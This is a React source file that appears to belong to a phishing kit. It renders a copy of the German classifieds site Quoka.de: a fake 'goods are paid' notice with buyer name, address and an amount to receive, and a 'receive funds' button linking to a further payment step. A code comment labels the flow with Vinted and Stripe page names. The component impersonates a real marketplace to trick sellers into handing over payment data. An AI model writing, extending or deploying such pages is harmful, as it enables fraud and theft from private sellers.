import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './QuokaDeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/de-quoka/logo.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function IconUser() {
  return (
    <svg className="quq-ico quq-ico--user" viewBox="0 0 24 24" aria-hidden>
      <circle cx="12" cy="12" r="10.25" fill="#fff" stroke="#e8c400" strokeWidth="1.75" />
      <circle cx="12" cy="10" r="3" fill="none" stroke="#9a9a9a" strokeWidth="1.5" />
      <path
        d="M6.75 18.25c.85-2.65 2.95-4.25 5.25-4.25s4.4 1.6 5.25 4.25"
        fill="none"
        stroke="#9a9a9a"
        strokeWidth="1.5"
        strokeLinecap="round"
      />
    </svg>
  );
}

function IconChat() {
  return (
    <svg className="quq-ico" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M21 12a8.5 8.5 0 0 1-1.1 4.2 8.5 8.5 0 0 1-7.6 4.3 8.4 8.4 0 0 1-3.9-1L3 20l1.9-5.6A8.4 8.4 0 0 1 3 12a8.5 8.5 0 0 1 4.3-7.6A8.4 8.4 0 0 1 12 3h.5A8.5 8.5 0 0 1 21 12Z"
        stroke="currentColor"
        strokeWidth="1.65"
        strokeLinejoin="round"
      />
    </svg>
  );
}

function IconBell() {
  return (
    <svg className="quq-ico" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M18 16H6l1.2-1.6V11a5.8 5.8 0 0 1 11.6 0v3.4L18 16Z"
        stroke="currentColor"
        strokeWidth="1.65"
        strokeLinejoin="round"
      />
      <path
        d="M10 18.5a2 2 0 0 0 4 0"
        stroke="currentColor"
        strokeWidth="1.65"
        strokeLinecap="round"
      />
      <path
        d="M12 4.5V3"
        stroke="currentColor"
        strokeWidth="1.65"
        strokeLinecap="round"
      />
    </svg>
  );
}

function IconHeart() {
  return (
    <svg className="quq-ico" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M12 20.5s-6.8-4.35-8.6-8.1C1.95 9.35 3.6 6.5 6.6 6.5c1.75 0 3.15.95 4 2.35.85-1.4 2.25-2.35 4-2.35 3 0 4.65 2.85 3.2 5.9-1.8 3.75-8.6 8.1-8.6 8.1Z"
        stroke="currentColor"
        strokeWidth="1.65"
        strokeLinejoin="round"
      />
    </svg>
  );
}

function IconCart() {
  return (
    <svg className="quq-ico" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M4 5h1.4l1.6 9.2h11.2l1.8-6.2H7"
        stroke="currentColor"
        strokeWidth="1.65"
        strokeLinecap="round"
        strokeLinejoin="round"
      />
      <circle cx="10" cy="19" r="1.35" stroke="currentColor" strokeWidth="1.65" />
      <circle cx="17" cy="19" r="1.35" stroke="currentColor" strokeWidth="1.65" />
    </svg>
  );
}

function IconSearch() {
  return (
    <svg className="quq-search-btn-ico" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M15.5 14h-.79l-.28-.27A6.471 6.471 0 0016 9.5 6.5 6.5 0 109.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 4 11.01 4 8s3.01-6 6.5-6S17 5.01 17 8s-3.01 6-6.5 6z"
      />
    </svg>
  );
}

/**
 * Quoka.de (DE): VintedStripe1 → success → index2 (VintedStripe2).
 */
function QuokaDeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'DE').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${currencyCode}`;

  const firstName = (pageData?.first_name || '').trim();
  const lastName = (pageData?.last_name || '').trim();
  const buyerLine = [firstName, lastName].filter(Boolean).join(' ') || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productName = (pageData?.product_name || '').trim() || '—';

  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPlaceholder = !photoSrc || imgFailed;
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const year = new Date().getFullYear();

  if (loading && pageCode) {
    return (
      <div className="quq-wrap" lang="de">
        <div className="quq-loading">Wird geladen…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="quq-wrap" lang="de">
      <header className="quq-header">
        <div className="quq-header-inner">
          <a href="#/" className="quq-brand" aria-label="Quoka Startseite">
            <img src={LOGO_SRC} alt="Quoka.de" className="quq-brand-img" decoding="async" />
          </a>
          <div className="quq-header-tools">
            <button type="button" className="quq-icon-pill quq-icon-pill--user" aria-label="Profil">
              <IconUser />
            </button>
            <button type="button" className="quq-icon-btn" aria-label="Nachrichten">
              <IconChat />
            </button>
            <button type="button" className="quq-icon-btn" aria-label="Benachrichtigungen">
              <IconBell />
            </button>
            <button type="button" className="quq-icon-btn" aria-label="Merkliste">
              <IconHeart />
            </button>
            <button type="button" className="quq-icon-btn" aria-label="Warenkorb">
              <IconCart />
            </button>
            <a href="#/" className="quq-btn-post">
              + Kostenlos inserieren
            </a>
          </div>
        </div>
      </header>

      <div className="quq-search-row">
        <input type="text" className="quq-search-field" placeholder="Was suchst Du?" readOnly />
        <button type="button" className="quq-search-dd">
          Alle Kategorien
        </button>
        <input type="text" className="quq-search-zip" placeholder="PLZ oder Ort" readOnly />
        <button type="button" className="quq-search-dd quq-search-dd--narrow">
          Umkreis
        </button>
        <button type="button" className="quq-search-submit" aria-label="Suchen">
          <IconSearch />
        </button>
      </div>

      <main className="quq-main">
        <div className="quq-layout">
          <div className="quq-product">
            <div className="quq-product-head">
              <h1 className="quq-product-title">{productName}</h1>
              <span className="quq-product-price">{amountLine}</span>
            </div>
            <div className="quq-product-img-wrap">
              {!showPlaceholder ? (
                <img src={photoSrc} alt="" className="quq-product-img" onError={() => setImgFailed(true)} />
              ) : (
                <div className="quq-product-ph" aria-hidden>
                  <span>{productName.slice(0, 1).toUpperCase()}</span>
                </div>
              )}
            </div>
          </div>

          <aside className="quq-aside">
            <h2 className="quq-aside-title">Die Ware ist bezahlt</h2>
            <p className="quq-aside-product">{productName}</p>
            <p className="quq-aside-price">{amountLine}</p>

            <table className="quq-table">
              <tbody>
                <tr>
                  <th scope="row">Name des Käufers</th>
                  <td>{buyerLine}</td>
                </tr>
                <tr>
                  <th scope="row">Adresse des Käufers</th>
                  <td>{address}</td>
                </tr>
                <tr>
                  <th scope="row">Betrag zu erhalten</th>
                  <td className="quq-table-amount">{amountLine}</td>
                </tr>
              </tbody>
            </table>

            <Link to={index2Path} className="quq-cta">
              Gelder empfangen
            </Link>
          </aside>
        </div>
      </main>

      <footer className="quq-footer">
        <div className="quq-footer-inner">
          <span className="quq-footer-copy">
            © {year} Quoka.de – Kostenlose Kleinanzeigenseite
          </span>
          <span className="quq-footer-ver" aria-hidden>
            26.04.10.a1b2c3d
          </span>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default QuokaDeSuccess;
